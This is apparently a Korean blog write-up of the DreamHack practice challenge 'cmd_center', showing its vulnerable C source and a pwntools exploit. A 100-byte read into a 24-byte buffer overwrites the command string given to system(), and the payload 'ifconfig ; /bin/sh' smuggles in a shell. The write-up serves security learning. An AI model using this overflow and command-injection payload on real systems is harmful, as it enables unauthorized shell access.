[DreamHack] cmd_center
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
}
int main()
{
char cmd_ip[256] = "ifconfig";
int dummy;
char center_name[24];
init();
printf("Center name: ");
read(0, center_name, 100);
if( !strncmp(cmd_ip, "ifconfig", 8)) {
system(cmd_ip);
}
else {
printf("Something is wrong!\n");
}
exit(0);
}호호, 이것도 펑펑 취약점이 터지는 문제인데 내가 멍청해서 그런지 조금 해맸다.
일단 center_name을 100이나 입력받을수 있다니, 누가봐도 read에서 펑펑~
더미 값으로 20개 보내고, 4개는 ifconfig 로 4바이트를 채운다.
왜냐면 string_compare을 통해서 ifconfig가 들어가 있어야 통과할 수 있으니, ifconfig도 넣어준다.
payload = b"A" * 0x20 + b"ifconfig ; /bin/sh"
요렇게 ifconfig; /bin/sh를 하면 쉘을 딸 수 있다.
from pwn import *
# p = process("./cmd_center")
p = connect("host3.dreamhack.games", 18336)
p.recvuntil("Center name: ")
payload = b"A" * 0x20 + b"ifconfig ; /bin/sh"
p.sendline(payload)
p.interactive()'Best of Best' 카테고리의 다른 글
| [DreamHack] Format string bug (0) | 2024.07.11 |
|---|---|
| [DreamHack] off_by_one_001 (0) | 2024.07.11 |
| [DreamHack] out_of_bound (0) | 2024.07.11 |
| [DreamHack] Return Address Overwrite (1) | 2024.07.09 |
| [BOB 교육] 실무로 알아보는 개인정보 안전성 확보조치와 유출사고 대응 - 김두민 멘토님 (0) | 2024.07.03 |